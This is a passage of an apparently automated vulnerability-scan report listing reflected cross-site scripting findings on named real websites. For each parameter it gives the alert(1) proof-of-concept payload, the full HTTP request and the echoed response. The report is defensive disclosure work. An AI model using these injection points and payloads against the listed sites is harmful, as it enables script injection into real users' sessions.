5.179. http://west.thomson.com/support/contact-us/default.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://west.thomson.com
Path: /support/contact-us/default.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdea"style%3d"x%3aexpression(alert(1))"22c4a465138 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8fdea"style="x:expression(alert(1))"22c4a465138 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the FindingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54b8b"%3balert(1)//787512fed9c was submitted in the FindingMethod parameter. This input was echoed as 54b8b";alert(1)//787512fed9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the PromCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 749d9"%3balert(1)//72d68614b4 was submitted in the PromCode parameter. This input was echoed as 749d9";alert(1)//72d68614b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
5.182. https://west.thomson.com/support/customer-service/order-info.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://west.thomson.com
Path: /support/customer-service/order-info.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8613a"style%3d"x%3aexpression(alert(1))"bb1d1f56e32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8613a"style="x:expression(alert(1))"bb1d1f56e32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2ebca<script>alert(1)</script>6a2cf77656a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /widget/Matrix2.do?domain=us-festivals&mode=concise&lat=25.7933333&long=-80.290556&startDate=4/30/2011&endDate=5/18/2011&callback=itandlEventsCallback2ebca<script>alert(1)</script>6a2cf77656a HTTP/1.1 Host: widget.needle.itasoftware.com Proxy-Connection: keep-alive Referer: http://matrix.itasoftware.com/view/details?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; JSESSIONID=1AA23091BF71FF338221489D9F6C0ECD.ita1needle6-reader
itandlEventsCallback2ebca<script>alert(1)</script>6a2cf77656a({"results":[["The 16th Annual National Children\'s Theatre Festival","16th annual national childrens theatre festival the",[[["Actors\' Playhouse at the Miracle Theatre","actors playhouse at the mirac ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 67881<script>alert(1)</script>d4ca36e90c2 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=http%3A//xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html67881<script>alert(1)</script>d4ca36e90c2 HTTP/1.1 Host: widgets.digg.com Proxy-Connection: keep-alive Referer: http://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the panelId request parameter is copied into the HTML document as plain text between tags. The payload d0616<script>alert(1)</script>374cd424dc0 was submitted in the panelId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /syndication/subscriber/InsertPanel.js?panelId=0ed14c91-dfd4-497f-b04b-3d371abe7a5ed0616<script>alert(1)</script>374cd424dc0 HTTP/1.1 Host: widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:46:17 GMT Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: application/x-javascript;charset=UTF-8 Content-Length: 6119
function libReadyCallback() { var parent_node = document.getElementById(parentNodeId); WIDGETBOX.subscriber.Main.insertPanel("0ed14c91-dfd4-497f-b04b-3d371abe7a5ed0616<script>alert(1)</script>374cd424dc0", parent_node); }
The value of the 980251%22';944334 request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5aa12(a)acca7f1048c was submitted in the 980251%22';944334 parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?980251%22';9443345aa12(a)acca7f1048c HTTP/1.1 Host: www.allpages.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
5.187. http://www.allpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.allpages.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 84a26(a)d3d1371b61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?980251%22';944334&84a26(a)d3d1371b61f=1 HTTP/1.1 Host: www.allpages.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68743"%3balert(1)//bb61ffcaafd was submitted in the channel parameter. This input was echoed as 68743";alert(1)//bb61ffcaafd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr68743"%3balert(1)//bb61ffcaafd&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the classification request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86e94"%3balert(1)//5616609a231 was submitted in the classification parameter. This input was echoed as 86e94";alert(1)//5616609a231 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply86e94"%3balert(1)//5616609a231&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... 7_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply86e94";alert(1)//5616609a231&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
The value of the creative_desc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d075"%3balert(1)//51083a8fbe0 was submitted in the creative_desc parameter. This input was echoed as 7d075";alert(1)//51083a8fbe0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf7d075"%3balert(1)//51083a8fbe0&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the creative_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6605f"%3balert(1)//45adfdbe294 was submitted in the creative_id parameter. This input was echoed as 6605f";alert(1)//45adfdbe294 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=389543536605f"%3balert(1)//45adfdbe294&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b0ef"%3balert(1)//b7cd0810838 was submitted in the destination parameter. This input was echoed as 6b0ef";alert(1)//b7cd0810838 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm6b0ef"%3balert(1)//b7cd0810838&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... gn_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm6b0ef";alert(1)//b7cd0810838&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=");
The value of the distribution request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff562"%3balert(1)//f7e8dbd9af9 was submitted in the distribution parameter. This input was echoed as ff562";alert(1)//f7e8dbd9af9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targff562"%3balert(1)//f7e8dbd9af9&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... &foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targff562";alert(1)//f7e8dbd9af9&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
setAllowDestURLOnSubmit(true);
/* an_arr's params * 0 - poid * 1 - redirect href * 2 - has popped up ...[SNIP]...
The value of the initiative request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a6c"%3balert(1)//51687862cc2 was submitted in the initiative parameter. This input was echoed as 35a6c";alert(1)//51687862cc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen35a6c"%3balert(1)//51687862cc2&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... e=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen35a6c";alert(1)//51687862cc2&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=");
The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5bc8"%3balert(1)//cf689d3bc25 was submitted in the keyword parameter. This input was echoed as b5bc8";alert(1)//cf689d3bc25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006b5bc8"%3balert(1)//cf689d3bc25&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... Net/hhs?pid=62A1E89CCBA3FB2D&pvp_design=&kw=&kw=&channel=banr&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006b5bc8";alert(1)//cf689d3bc25&v1=aptm&v2=&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal_code=&program_type=&program_type2 ...[SNIP]...
The value of the mktg_prog request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fe23"%3balert(1)//02c8aa1a94a was submitted in the mktg_prog parameter. This input was echoed as 5fe23";alert(1)//02c8aa1a94a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen5fe23"%3balert(1)//02c8aa1a94a&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... e=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen5fe23";alert(1)//02c8aa1a94a&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
The value of the provider request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0f7a"%3balert(1)//300fb6cc037 was submitted in the provider parameter. This input was echoed as a0f7a";alert(1)//300fb6cc037 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSNa0f7a"%3balert(1)//300fb6cc037&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSNa0f7a";alert(1)//300fb6cc037&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=D55602 ...[SNIP]...
The value of the pvp_campaign request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 937af"%3balert(1)//10c054b4a93 was submitted in the pvp_campaign parameter. This input was echoed as 937af";alert(1)//10c054b4a93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
